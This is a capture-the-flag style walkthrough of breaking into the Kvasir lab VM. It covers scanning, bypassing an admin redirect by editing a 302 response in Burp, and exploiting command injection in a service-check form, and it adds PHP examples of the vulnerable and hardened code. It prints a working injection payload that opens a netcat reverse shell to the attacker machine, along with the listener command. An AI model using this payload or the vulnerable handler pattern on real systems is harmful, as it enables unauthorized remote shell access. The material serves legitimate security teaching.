Kvasir is a Linux virtual machine distributed in OVA format. Environment:
Attacker machine: Kali Linux, 192.168.44.136. Victim: Kvasir, 192.168.44.129.
When you boot the Kvasir VM, the console looks as follows: Debian GNU/Linux 7 kvasir tty1 Kvasir Login:
Let us run an aggressive Nmap scan with version detection against the target VM using the following command: #nmap -A -sV 192.168.44.129
The Nmap results show that only port 80/tcp is open, serving HTTP from an Apache httpd 2.2.22 (Debian) installation. Now let us visit the site by entering the following URL: http://192.168.44.129
As seen below, a login page appears. Now let us run a Nikto scan in parallel. The command used for website scanning with Nikto is: #nikto -h http://192.168.44.129
Let us also run a directory brute-force scan in parallel. The following command is used for enumerating directories on Kvasir: #dirb http://192.168.44.129
By analyzing the output, we can see that the following URLs are worth testing: http://192.168.44.129/admin.php http://192.168.44.129/index.php Let us visit the admin page first. Since the page answers with a 302 redirect, the redirect can be observed in Burp Suite.
As we would like to see admin.php in our browser, we request http://192.168.44.129/admin.php from the server. Response from the server:
Now edit the 302 status to 200 as shown below:
After changing the response, forward it to the browser and you will see the following page:
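Why rewriting the status code in the proxy is enough to see the page: the server has already put the protected HTML into the body of the 302 response, and all the edit does is stop the browser from following the redirect. The usual cause is a script that calls header('Location: ...') and then keeps executing. The following is an added illustration, not the Kvasir source; that admin.php is structured this way is an assumption, and the form field names "service" and "submit" are taken from the request used later in this walkthrough.

```php
<?php
// Added example (not the Kvasir source). Two ways the "redirect if not logged in"
// check in a PHP admin page can be written. That the real admin.php looks like this
// is an assumption; the flawed version is what produces a 302 whose body can be
// rendered simply by changing the status line to 200 in an intercepting proxy.
session_start();

function isLoggedIn(): bool
{
    return !empty($_SESSION['user']);
}

// FLAWED: header() only queues a response header. PHP keeps executing, so the
// protected HTML further down is still generated and sent as the body of the 302.
function guardFlawed(): void
{
    if (!isLoggedIn()) {
        header('Location: index.php', true, 302);
        // missing exit: execution continues into the protected page
    }
}

// FIXED: stop the script right after queuing the redirect, so the 302 carries no
// privileged content for a proxy (or a curious client) to expose.
function guardFixed(): void
{
    if (!isLoggedIn()) {
        header('Location: index.php', true, 302);
        exit;
    }
}

guardFixed();   // with guardFlawed() here, the form below would be sent anyway
?>
<form method="post" action="admin.php">
  <label>Service: <input name="service"></label>
  <input type="submit" name="submit" value="Submit">
</form>
```

Note that an exit after the redirect only stops the page from leaking; it does not, by itself, protect the action the page performs. The guard must run before any POST handling in the same script, otherwise a client that never sees the form can still submit to it directly, which is exactly what the curl request later in this walkthrough does.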
The service check function looks like a good candidate for command injection, since the status of a service is obtained by running the following command in a terminal: service apache2 status Assuming our input is passed to the shell, we can try command injection. Well, I tried a few syntaxes and a few commands, but the commands failed. Working out the correct syntax was a bit of a difficult task. The following command was able to give me shell access: #curl --data "service=ssh; netcat -e /bin/bash 192.168.44.136 1234; id #&submit=Submit" http://192.168.44.129/admin.php
A listener was set up on port 1234 for the incoming connection. The command used was: #nc -lvvp 1234
Finally, I got the shell.
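For the defender's side of this finding, the handler below is an added reconstruction of the kind of code that makes "service=ssh; ..." dangerous, placed beside a hardened form. It is not the Kvasir source: the parameter names "service" and "submit" come from the request above, and everything else (function names, the allowlist contents) is assumed.

```php
<?php
// Added example, not the Kvasir source. The request parameter "service" is pasted
// into a shell command line in the vulnerable version; the hardened version accepts
// only known service names and quotes the argument as defense in depth.

// VULNERABLE: shell metacharacters in $service (; | && ` $( ) and a trailing #)
// let the client run arbitrary commands as the web server user. A value such as
// "ssh; id #" turns into "service ssh; id # status".
function serviceStatusVulnerable(string $service): string
{
    $out = shell_exec("service $service status 2>&1");
    return is_string($out) ? $out : '';
}

// HARDENED:
//  1. reject anything that is not on a fixed allowlist (assumed contents), so no
//     attacker-controlled text reaches the shell at all;
//  2. still quote the argument with escapeshellarg(), so that even a later change
//     to the allowlist cannot reintroduce injection;
//  3. the returned text is served as text/plain below, not echoed into HTML.
const ALLOWED_SERVICES = ['apache2', 'ssh', 'mysql'];

function serviceStatusHardened(string $service): string
{
    if (!in_array($service, ALLOWED_SERVICES, true)) {
        http_response_code(400);
        return "unknown service\n";
    }
    $cmd = 'service ' . escapeshellarg($service) . ' status 2>&1';
    $out = shell_exec($cmd);
    return is_string($out) ? $out : '';
}

// An authentication check belongs before this point (omitted here); the request
// in the walkthrough carried no session at all and was still executed.
if (isset($_POST['submit'])) {
    $service = (string)($_POST['service'] ?? '');
    header('Content-Type: text/plain');
    echo serviceStatusHardened($service);
}
```

With the hardened handler, the walkthrough's payload is rejected at the in_array() check and never reaches shell_exec(). Beyond the code change, the reverse shell itself is a good detection signal: a web server process (www-data) spawning netcat or a shell with an outbound TCP connection is something process-auditing tools can alert on regardless of how the injection was phrased.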